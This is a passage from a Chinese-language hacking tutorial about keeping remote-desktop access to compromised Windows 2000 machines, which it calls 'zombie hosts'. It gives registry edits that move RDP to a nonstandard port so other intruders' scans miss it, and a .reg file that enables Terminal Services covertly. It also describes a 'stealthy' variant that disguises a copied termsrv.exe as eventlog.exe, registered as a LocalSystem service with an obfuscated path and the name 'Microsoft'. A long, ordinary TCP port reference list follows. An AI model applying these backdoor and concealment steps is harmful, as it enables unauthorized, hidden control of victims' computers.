命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下
。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装
终端服务。
到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!
我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对
目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口
来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
第五种方法:
一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:
-------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
-----------
2.重新起动"肉机"。
3.使用本地的3398客户端,连接 "肉机" .
4.优(缺)点:
A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:
A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.
二.抛砖引玉性"隐蔽"安装:
1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"
2.将如下注册表键值导入 "肉机" 的注册表中:
------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
---------------
3.重新起动"肉机"。
4.使用本地的3398客户端,连接“肉机”。
5.优(缺)点:
A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".
三.理论简介
如此简单? 只修改注册表? 不需要拷贝W2k源文件?
让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------
首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:
"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"
这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".
打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.
在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.
为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件.
各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实.
"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.
"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.
我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?
"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".
"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.
我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.
[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?
常用端口说明:
再介绍端口前,先看一下端口的基本知道吧。
1.公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
2. 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。
3. 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
1 tcpmux TCP Port Service Multiplexer 传输控制协议端口服务多路开关选择器
2 compressnet Management Utility compressnet 管理实用程序
3 compressnet Compression Process 压缩进程
5 rje Remote Job Entry 远程作业登录
7 echo Echo 回显
9 discard Discard 丢弃
11 systat Active Users 在线用户
13 daytime Daytime 时间
17 qotd Quote of the Day 每日引用
18 msp Message Send Protocol 消息发送协议
19 chargen Character Generator 字符发生器
20 ftp-data File Transfer [Default Data] 文件传输协议(默认数据口)
21 ftp File Transfer [Control] 文件传输协议(控制)
22 ssh SSH Remote Login Protocol SSH远程登录协议
23 telnet Telnet 终端仿真协议
24 ? any private mail system 预留给个人用邮件系统
25 smtp Simple Mail Transfer 简单邮件发送协议
27 nsw-fe NSW User System FE NSW 用户系统现场工程师
29 msg-icp MSG ICP MSG ICP
31 msg-auth MSG Authentication MSG验证
33 dsp Display Support Protocol 显示支持协议
35 ? any private printer server 预留给个人打印机服务
37 time Time 时间
38 rap Route Access Protocol 路由访问协议
39 rlp Resource Location Protocol 资源定位协议
41 graphics Graphics 图形
42 nameserver WINS Host Name Server WINS 主机名服务
43 nicname Who Is "绰号" who is服务
44 mpm-flags MPM FLAGS Protocol MPM(消息处理模块)标志协议
45 mpm Message Processing Module [recv] 消息处理模块
46 mpm-snd MPM [default send] 消息处理模块(默认发送口)
47 ni-ftp NI FTP NI FTP
48 auditd Digital Audit Daemon 数码音频后台服务
49 tacacs Login Host Protocol (TACACS) TACACS登录主机协议
50 re-mail-ck Remote Mail Checking Protocol 远程邮件检查协议
51 la-maint IMP Logical Address Maintenance IMP(接口信息处理机)逻辑地址维护
52 xns-time XNS Time Protocol 施乐网络服务系统时间协议
53 domain Domain Name Server 域名服务器
54 xns-ch XNS Clearinghouse 施乐网络服务系统票据交换
55 isi-gl ISI Graphics Language ISI图形语言
56 xns-auth XNS Authentication 施乐网络服务系统验证
57 ? any private terminal access 预留个人用终端访问
58 xns-mail XNS Mail 施乐网络服务系统邮件
59 ? any private file service 预留个人文件服务
60 ? Unassigned 未定义
61 ni-mail NI MAIL NI邮件?
62 acas ACA Services 异步通讯适配器服务
63 whois+ whois+ WHOIS+
64 covia Communications Integrator (CI) 通讯接口
65 tacacs-ds TACACS-Database Service TACACS数据库服务
66 sql*net Oracle SQL*NET Oracle SQL*NET
67 bootps Bootstrap Protocol Server 引导程序协议服务端
68 bootpc Bootstrap Protocol Client 引导程序协议客户端
69 tftp Trivial File Transfer 小型文件传输协议
70 gopher Gopher 信息检索协议
71 netrjs-1 Remote Job Service 远程作业服务
72 netrjs-2 Remote Job Service 远程作业服务
73 netrjs-3 Remote Job Service 远程作业服务
74 netrjs-4 Remote Job Service 远程作业服务
75 ? any private dial out service 预留给个人拨出服务
76 deos Distributed External Object Store 分布式外部对象存储
77 ? any private RJE service 预留给个人远程作业输入服务
78 vettcp vettcp 修正TCP?
79 finger Finger FINGER(查询远程主机在线用户等信息)
80 http World Wide Web HTTP 全球信息网超文本传输协议
81 hosts2-ns HOSTS2 Name Server HOST2名称服务
82 xfer XFER Utility 传输实用程序
83 mit-ml-dev MIT ML Device 模块化智能终端ML设备
84 ctf Common Trace Facility 公用追踪设备
85 mit-ml-dev MIT ML Device 模块化智能终端ML设备
86 mfcobol Micro Focus Cobol Micro Focus Cobol编程语言
87 ? any private terminal link 预留给个人终端连接
88 kerberos Kerberos Kerberros安全认证系统
89 su-mit-tg SU/MIT Telnet Gateway SU/MIT终端仿真网关
90 dnsix DNSIX Securit Attribute Token Map DNSIX 安全属性标记图
91 mit-dov MIT Dover Spooler MIT Dover假脱机
92 npp Network Printing Protocol 网络打印协议
93 dcp Device Control Protocol 设备控制协议
94 objcall Tivoli Object Dispatcher Tivoli对象调度
95 supdup SUPDUP
96 dixie DIXIE Protocol Specification DIXIE协议规范
97 swift-rvf Swift Remote Virtural File Protocol 快速远程虚拟文件协议
98 tacnews TAC News TAC(东京大学自动计算机?)新闻协议
99 metagram Metagram Relay
101/tcp hostname NIC Host Name Server
102/tcp iso-tsap ISO-TSAP Class 0
103/tcp gppitnp Genesis Point-to-Point Trans Net
104/tcp acr-nema ACR-NEMA Digital Imag. & Comm. 300
105/tcp cso CCSO name server protocol
105/tcp csnet-ns Mailbox Name Nameserver
106/tcp 3com-tsmux 3COM-TSMUX
107/tcp rtelnet Remote Telnet Service
108/tcp snagas SNA Gateway Access Server
109/tcp pop2 Post Office Protocol - Version 2
110/tcp pop3 Post Office Protocol - Version 3
111/tcp sunrpc SUN Remote Procedure Call
112/tcp mcidas McIDAS Data Transmission Protocol
113/tcp ident
114/tcp audionews Audio News Multicast
115/tcp sftp Simple File Transfer Protocol
116/tcp ansanotify ANSA REX Notify
117/tcp uucp-path UUCP Path Service
118/tcp sqlserv SQL Services
119/tcp nntp Network News Transfer Protocol
120/tcp cfdptkt CFDPTKT
121/tcp erpc Encore Expedited Remote Pro.Call
122/tcp smakynet SMAKYNET
123/tcp ntp Network Time Protocol
124/tcp ansatrader ANSA REX Trader
125/tcp locus-map Locus PC-Interface Net Map Ser
126/tcp unitary Unisys Unitary Login
127/tcp locus-con Locus PC-Interface Conn Server
128/tcp gss-xlicen GSS X License Verification
129/tcp pwdgen Password Generator Protocol
130/tcp cisco-fna cisco FNATIVE
131/tcp cisco-tna cisco TNATIVE
132/tcp cisco-sys cisco SYSMAINT
133/tcp statsrv Statistics Service
134/tcp ingres-net INGRES-NET Service
135/tcp epmap DCE endpoint resolution
136/tcp profile PROFILE Naming System
137/tcp netbios-ns NETBIOS Name Service
138/tcp netbios-dgm NETBIOS Datagram Service
139/tcp netbios-ssn NETBIOS Session Service
140/tcp emfis-data EMFIS Data Service
141/tcp emfis-cntl EMFIS Control Service
142/tcp bl-idm Britton-Lee IDM
143/tcp imap Internet Message Access Protocol
144/tcp uma Universal Management Architecture
145/tcp uaac UAAC Protocol
146/tcp iso-tp0 ISO-IP0
147/tcp iso-ip ISO-IP
148/tcp jargon Jargon
149/tcp aed-512 AED 512 Emulation Service
150/tcp sql-net SQL-NET
151/tcp hems HEMS
152/tcp bftp Background File Transfer Program
153/tcp sgmp SGMP
154/tcp netsc-prod NETSC
155/tcp netsc-dev NETSC
156/tcp sqlsrv SQL Service
157/tcp knet-cmp KNET/VM Command/Message Protocol
158/tcp pcmail-srv PCMail Server
159/tcp nss-routing NSS-Routing
160/tcp sgmp-traps SGMP-TRAPS
161/tcp snmp SNMP
162/tcp snmptrap SNMPTRAP
163/tcp cmip-man CMIP/TCP Manager
164/tcp cmip-agent CMIP/TCP Agent
165/tcp xns-courier Xerox
166/tcp s-net Sirius Systems
167/tcp namp NAMP
168/tcp rsvd RSVD
169/tcp send SEND
170/tcp print-srv Network PostScript
171/tcp multiplex Network Innovations Multiplex
172/tcp cl/1 Network Innovations CL/1
173/tcp xyplex-mux Xyplex
174/tcp mailq MAILQ
175/tcp vmnet VMNET
176/tcp genrad-mux GENRAD-MUX
177/tcp xdmcp X Display Manager Control Protocol
178/tcp nextstep NextStep Window Server
179/tcp bgp Border Gateway Protocol
180/tcp ris Intergraph
181/tcp unify Unify
182/tcp audit Unisys Audit SITP
183/tcp ocbinder OCBinder
184/tcp ocserver OCServer
185/tcp remote-kis Remote-KIS
186/tcp kis KIS Protocol
187/tcp aci Application Communication Interface
188/tcp mumps Plus Five‘s MUMPS
189/tcp qft Queued File Transport
190/tcp gacp Gateway Access Control Protocol
191/tcp prospero Prospero Directory Service
192/tcp osu-nms OSU Network Monitoring System
193/tcp srmp Spider Remote Monitoring Protocol
194/tcp irc Internet Relay Chat Protocol
195/tcp dn6-nlm-aud DNSIX Network Level Module Audit
196/tcp dn6-smm-red DNSIX Session Mgt Module Audit Redir
197/tcp dls Directory Location Service
198/tcp dls-mon Directory Location Service Monitor
199/tcp smux SMUX
200/tcp src IBM System Resource Controller
201/tcp at-rtmp AppleTalk Routing Maintenance
202/tcp at-nbp AppleTalk Name Binding
203/tcp at-3 AppleTalk Unused
204/tcp at-echo AppleTalk Echo
205/tcp at-5 AppleTalk Unused
206/tcp at-zis AppleTalk Zone Information
207/tcp at-7 AppleTalk Unused
208/tcp at-8 AppleTalk Unused
209/tcp qmtp The Quick Mail Transfer Protocol
210/tcp z39.50 ANSI Z39.50
211/tcp 914c/g Texas Instruments 914C/G Terminal
212/tcp anet ATEXSSTR
214/tcp vmpwscs VM PWSCS
215/tcp softpc Insignia Solutions
216/tcp CAIlic Computer Associates Int‘l License Server
217/tcp dbase dBASE Unix
218/tcp mpp Netix Message Posting Protocol
219/tcp uarps Unisys ARPs
220/tcp imap3 Interactive Mail Access Protocol v3
221/tcp fln-spx Berkeley rlogind with SPX auth
222/tcp rsh-spx Berkeley rshd with SPX auth
223/tcp cdc Certificate Distribution Center
242/tcp direct Direct
243/tcp sur-meas Survey Measurement
244/tcp dayna Dayna
245/tcp link LINK
246/tcp dsp3270 Display Systems Protocol
247/tcp subntbcst_tftp SUBNTBCST_TFTP
248/tcp bhfhs bhfhs
256/tcp rap RAP
257/tcp set Secure Electronic Transaction
258/tcp yak-chat Yak Winsock Personal Chat
259/tcp esro-gen Efficient Short Remote Operations
260/tcp openport Openport
263/tcp hdap HDAP
264/tcp bgmp BGMP
280/tcp http-mgmt http-mgmt
309/tcp entrusttime EntrustTime
310/tcp bhmds bhmds
312/tcp vslmp VSLMP
315/tcp dpsi DPSI
316/tcp decauth decAuth
317/tcp zannet Zannet
321/tcp pip PIP
344/tcp pdap Prospero Data Access Protocol
345/tcp pawserv Perf Analysis Workbench
346/tcp zserv Zebra server
347/tcp fatserv Fatmen Server
348/tcp csi-sgwp Cabletron Management Protocol
349/tcp mftp mftp
351/tcp matip-type-b MATIP Type B
351/tcp bhoetty bhoetty (added 5/21/97)
353/tcp ndsauth NDSAUTH
354/tcp bh611 bh611
357/tcp bhevent bhevent
362/tcp srssend SRS Send
365/tcp dtk DTK
366/tcp odmr ODMR
368/tcp qbikgdp QbikGDP
371/tcp clearcase Clearcase
372/tcp ulistproc ListProcessor
373/tcp legent-1 Legent Corporation
374/tcp legent-2
374/tcp legent-2 Legent Corporation
375/tcp hassle Hassle
376/tcp nip Amiga Envoy Network Inquiry Proto
377/tcp tnETOS NEC Corporation
378/tcp dsETOS NEC Corporation
379/tcp is99c TIA/EIA/IS-99 modem client
380/tcp is99s TIA/EIA/IS-99 modem server
381/tcp hp-collector hp performance data collector
383/tcp hp-alarm-mgr hp performance data alarm manager
384/tcp arns A Remote Network Server System
385/tcp ibm-app IBM Application
386/tcp asa ASA Message Router Object Def.
387/tcp aurp Appletalk Update-Based Routing Pro.
388/tcp unidata-ldm Unidata LDM Version 4
389/tcp ldap Lightweight Directory Access Protocol
390/tcp uis UIS
391/tcp synotics-relay SynOptics SNMP Relay Port
393/tcp dis Data Interpretation System
394/tcp embl-ndt EMBL Nucleic Data Transfer
395/tcp netcp NETscout Control Protocol
396/tcp netware-ip Novell Netware over IP
397/tcp mptn Multi Protocol Trans. Net.
398/tcp kryptolan Kryptolan
399/tcp iso-tsap-c2 ISO Transport Class 2 Non-Control over TCP
400/tcp work-sol Workstation Solutions
401/tcp ups Uninterruptible Power Supply
402/tcp genie Genie Protocol
403/tcp decap decap
404/tcp nced nced
405/tcp ncld ncld
406/tcp imsp Interactive Mail Support Protocol
407/tcp timbuktu Timbuktu
408/tcp prm-sm Prospero Resource Manager Sys. Man.
409/tcp prm-nm Prospero Resource Manager Node Man.
410/tcp decladebug DECLadebug Remote Debug Protocol
411/tcp rmt Remote MT Protocol
412/tcp synoptics-trap Trap Convention Port
413/tcp smsp SMSP
414/tcp infoseek InfoSeek
415/tcp bnet BNet
416/tcp silverplatter Silverplatter
417/tcp onmux Onmux
418/tcp hyper-g Hyper-G
419/tcp ariel1 Ariel
420/tcp smpte SMPTE
421/tcp ariel2 Ariel
422/tcp ariel3 Ariel
423/tcp opc-job-start IBM Operations Planning and Control Start
424/tcp opc-job-track IBM Operations Planning and Control Track
425/tcp icad-el ICAD
426/tcp smartsdp smartsdp
427/tcp svrloc Server Location
428/tcp ocs_cmu OCS_CMU
429/tcp ocs_amu OCS_AMU
430/tcp utmpsd UTMPSD
431/tcp utmpcd UTMPCD
432/tcp iasd IASD
433/tcp nnsp NNSP
434/tcp mobileip-agent MobileIP-Agent
435/tcp mobilip-mn MobilIP-MN
436/tcp dna-cml DNA-CML
437/tcp comscm comscm
438/tcp dsfgw dsfgw
439/tcp dasp dasp Thomas Obermair
440/tcp sgcp sgcp
441/tcp decvms-sysmgt decvms-sysmgt
442/tcp cvc_hostd cvc_hostd
443/tcp https http protocol over TLS/SSL
444/tcp snpp Simple Network Paging Protocol
445/tcp microsoft-ds Microsoft-DS
446/tcp ddm-rdb DDM-RDB
447/tcp ddm-dfm DDM-RFM
448/tcp ddm-ssl DDM-SSL
449/tcp as-servermap AS Server Mapper
450/tcp tserver TServer
451/tcp sfs-smp-net Cray Network Semaphore server
453/tcp creativeserver CreativeServer
454/tcp contentserver ContentServer
455/tcp creativepartnr CreativePartnr
456/tcp macon-tcp macon-tcp
457/tcp scohelp scohelp
458/tcp appleqtc apple quick time
459/tcp ampr-rcmd ampr-rcmd
460/tcp skronk skronk
461/tcp datasurfsrv DataRampSrv
462/tcp datasurfsrvsec DataRampSrvSec
463/tcp alpes alpes
464/tcp kpasswd kpasswd
465/tcp smtps smtp protocol over TLS/SSL (was ssmtp)
466/tcp digital-vrc digital-vrc
467/tcp mylex-mapd mylex-mapd
468/tcp photuris proturis
469/tcp rcp Radio Control Protocol
470/tcp scx-proxy scx-proxy
471/tcp mondex Mondex
472/tcp ljk-login ljk-login
473/tcp hybrid-pop hybrid-pop
474/tcp tn-tl-w1 tn-tl-w1
475/tcp tcpnethaspsrv tcpnethaspsrv
476/tcp tn-tl-fd1 tn-tl-fd1
477/tcp ss7ns ss7ns
478/tcp spsc spsc
479/tcp iafserver iafserver
480/tcp iafdbase iafdbase
481/tcp ph Ph service
482/tcp bgs-nsi bgs-nsi
483/tcp ulpnet ulpnet
484/tcp integra-sme Integra Software Management Environment
485/tcp powerburst Air Soft Power Burst
486/tcp avian avian
487/tcp saft saft Simple Asynchronous File Transfer
488/tcp gss-http gss-http
489/tcp nest-protocol nest-protocol
490/tcp micom-pfs micom-pfs
491/tcp go-login go-login
492/tcp ticf-1 Transport Independent Convergence for FNA
493/tcp ticf-2 Transport Independent Convergence for FNA
494/tcp pov-ray POV-Ray
495/tcp intecourier intecourier
496/tcp pim-rp-disc PIM-RP-DISC
497/tcp dantz dantz
498/tcp siam siam
499/tcp iso-ill ISO ILL Protocol
500/tcp isakmp isakmp
501/tcp stmf STMF
502/tcp asa-appl-proto asa-appl-proto
503/tcp intrinsa Intrinsa
504/tcp citadel citadel
505/tcp mailbox-lm mailbox-lm
506/tcp ohimsrv ohimsrv
507/tcp crs crs
508/tcp xvttp xvttp
509/tcp snare snare
510/tcp fcp FirstClass Protocol
511/tcp passgo PassGo
512/tcp exec remote process execution;
513/tcp login remote login a la telnet;
514/tcp shell cmd
515/tcp printer spooler
516/tcp videotex videotex
517/tcp talk like tenex link, but across
518/tcp ntalk
519/tcp utime unixtime
520/tcp efs extended file name server
521/tcp ripng ripng
522/tcp ulp ULP
523/tcp ibm-db2 IBM-DB2
524/tcp ncp NCP
525/tcp timed timeserver
526/tcp tempo newdate
527/tcp stx Stock IXChange
528/tcp custix Customer IXChange
529/tcp irc-serv IRC-SERV
530/tcp courier rpc
531/tcp conference chat
532/tcp netnews readnews
533/tcp netwall for emergency broadcasts
534/tcp mm-admin MegaMedia Admin
535/tcp iiop iiop
536/tcp opalis-rdv opalis-rdv
537/tcp nmsp Networked Media Streaming Protocol
538/tcp gdomap gdomap
539/tcp apertus-ldp Apertus Technologies Load Determination
540/tcp uucp uucpd
541/tcp uucp-rlogin uucp-rlogin
542/tcp commerce commerce
543/tcp klogin
544/tcp kshell krcmd
545/tcp appleqtcsrvr appleqtcsrvr
546/tcp dhcpv6-client DHCPv6 Client
547/tcp dhcpv6-server DHCPv6 Server
548/tcp afpovertcp AFP over TCP
549/tcp idfp IDFP
550/tcp new-rwho new-who
551/tcp cybercash cybercash
552/tcp deviceshare deviceshare
553/tcp pirp pirp
554/tcp rtsp Real Time Stream Control Protocol
555/tcp dsf
556/tcp remotefs rfs server
557/tcp openvms-sysipc openvms-sysipc
558/tcp sdnskmp SDNSKMP
559/tcp teedtap TEEDTAP
560/tcp rmonitor rmonitord
561/tcp monitor
562/tcp chshell chcmd
563/tcp nntps nntp protocol over TLS/SSL (was snntp)
564/tcp 9pfs plan 9 file service
565/tcp whoami whoami
566/tcp streettalk streettalk
567/tcp banyan-rpc banyan-rpc
568/tcp ms-shuttle microsoft shuttle
569/tcp ms-rome microsoft rome
570/tcp meter demon
571/tcp meter udemon
572/tcp sonar sonar
573/tcp banyan-vip banyan-vip
574/tcp ftp-agent FTP Software Agent System
575/tcp vemmi VEMMI
576/tcp ipcd ipcd
577/tcp vnas vnas
578/tcp ipdd ipdd
579/tcp decbsrv decbsrv
581/tcp bdp Bundle Discovery Protocol
588/tcp cal CAL
589/tcp eyelink EyeLink
590/tcp tns-cml TNS CML
593/tcp http-rpc-epmap HTTP RPC Ep Map
594/tcp tpip TPIP
596/tcp smsd SMSD
599/tcp acp Aeolon Core Protocol
600/tcp ipcserver Sun IPC server
606/tcp urm Cray Unified Resource Manager
607/tcp nqs nqs
608/tcp sift-uft Sender-Initiated/Unsolicited File Transfer
609/tcp npmp-trap npmp-trap
610/tcp npmp-local npmp-local
611/tcp npmp-gui npmp-gui
613/tcp hmmp-op HMMP Operation
620/tcp sco-websrvrmgr SCO WebServer Manager
621/tcp escp-ip ESCP
625/tcp dec_dlm DEC DLM
626/tcp asia ASIA
628/tcp qmqp QMQP
630/tcp rda RDA
631/tcp ipp IPP (Internet Printing Protocol)
632/tcp bmpp bmpp
634/tcp ginad ginad
635/tcp rlzdbase RLZ DBase
636/tcp ldaps ldap protocol over TLS/SSL (was sldap)
637/tcp lanserver lanserver
639/tcp msdp MSDP
666/tcp doom doom Id Software
667/tcp disclose campaign contribution disclosures - SDR Technologies
668/tcp mecomm MeComm
669/tcp meregister MeRegister
670/tcp vacdsm-sws VACDSM-SWS
671/tcp vacdsm-app VACDSM-APP
672/tcp vpps-qua VPPS-QUA
673/tcp cimplex CIMPLEX
674/tcp acap ACAP
675/tcp dctp DCTP
704/tcp elcsd errlog copy/server daemon
705/tcp agentx AgentX
709/tcp entrust-kmsh Entrust Key Management Service Handler
710/tcp entrust-ash Entrust Administration Service Handler
729/tcp netviewdm1 IBM NetView DM/6000 Server/Client
730/tcp netviewdm2 IBM NetView DM/6000 send/tcp
731/tcp netviewdm3 IBM NetView DM/6000 receive/tcp
741/tcp netgw netGW
742/tcp netrcs Network based Rev. Cont. Sys.
744/tcp flexlm Flexible License Manager
747/tcp fujitsu-dev Fujitsu Device Control
748/tcp ris-cm Russell Info Sci Calendar Manager
749/tcp kerberos-adm kerberos administration
750/tcp rfile
751/tcp pump
752/tcp qrh
753/tcp rrh
754/tcp tell send
758/tcp nlogin
759/tcp con
760/tcp ns
761/tcp rxe
762/tcp quotad
763/tcp cycleserv
764/tcp omserv
765/tcp webster
769/tcp vid
770/tcp cadlock
771/tcp rtip
772/tcp cycleserv2
773/tcp submit
774/tcp rpasswd
776/tcp wpages
780/tcp wpgs
786/tcp concert Concert
787/tcp qsc QSC
801/tcp device
873/tcp rsync rsync
886/tcp iclcnet-locate ICL coNETion locate server
887/tcp iclcnet_svinfo ICL coNETion server info
888/tcp accessbuilder AccessBuilder
900/tcp omginitialrefs OMG Initial Refs
911/tcp xact-backup xact-backup
990/tcp ftps ftp protocol, control, over TLS/SSL
991/tcp nas Netnews Administration System
992/tcp telnets telnet protocol over TLS/SSL
993/tcp imaps imap4 protocol over TLS/SSL
994/tcp ircs irc protocol over TLS/SSL
995/tcp pop3s pop3 protocol over TLS/SSL (was spop3)
996/tcp vsinet vsinet
997/tcp maitrd
998/tcp busboy
999/tcp garcon 1000/tcp cadlock
1010/tcp surf surf
1023/tcp Reserved Reserved
1030/tcp iad1 BBN IAD
1031/tcp iad2 BBN IAD
1032/tcp iad3 BBN IAD
1047/tcp neod1 Sun‘s NEO Object Request Broker
1048/tcp neod2 Sun‘s NEO Object Request Broker
1058/tcp nim nim
1059/tcp nimreg nimreg
1067/tcp instl_boots Installation Bootstrap Proto. Serv.
1068/tcp instl_bootc Installation Bootstrap Proto. Cli.
1080/tcp socks Socks
1083/tcp ansoft-lm-1 Anasoft License Manager
1084/tcp ansoft-lm-2 Anasoft License Manager
1123/tcp murray Murray
1155/tcp nfa Network File Access
1212/tcp lupa lupa
1222/tcp nerv SNI R&D network
1239/tcp nmsd NMSD
1248/tcp hermes
1313/tcp bmc_patroldb BMC_PATROLDB
1314/tcp pdps Photoscript Distributed Printing System
1321/tcp pip PIP
1345/tcp vpjp VPJP
1346/tcp alta-ana-lm Alta Analytics License Manager
1347/tcp bbn-mmc multi media conferencing
1348/tcp bbn-mmx multi media conferencing
1349/tcp sbook Registration Network Protocol
1350/tcp editbench Registration Network Protocol
1352/tcp lotusnote Lotus Note
1353/tcp relief Relief Consulting
1354/tcp rightbrain RightBrain Software
1355/tcp intuitive-edge Intuitive Edge
1356/tcp cuillamartin CuillaMartin Company
1357/tcp pegboard Electronic PegBoard
1358/tcp connlcli CONNLCLI
1359/tcp ftsrv FTSRV
1360/tcp mimer MIMER
1361/tcp linx LinX
1362/tcp timeflies TimeFlies
1363/tcp ndm-requester Network DataMover Requester
1364/tcp ndm-server Network DataMover Server
1365/tcp adapt-sna Network Software Associates
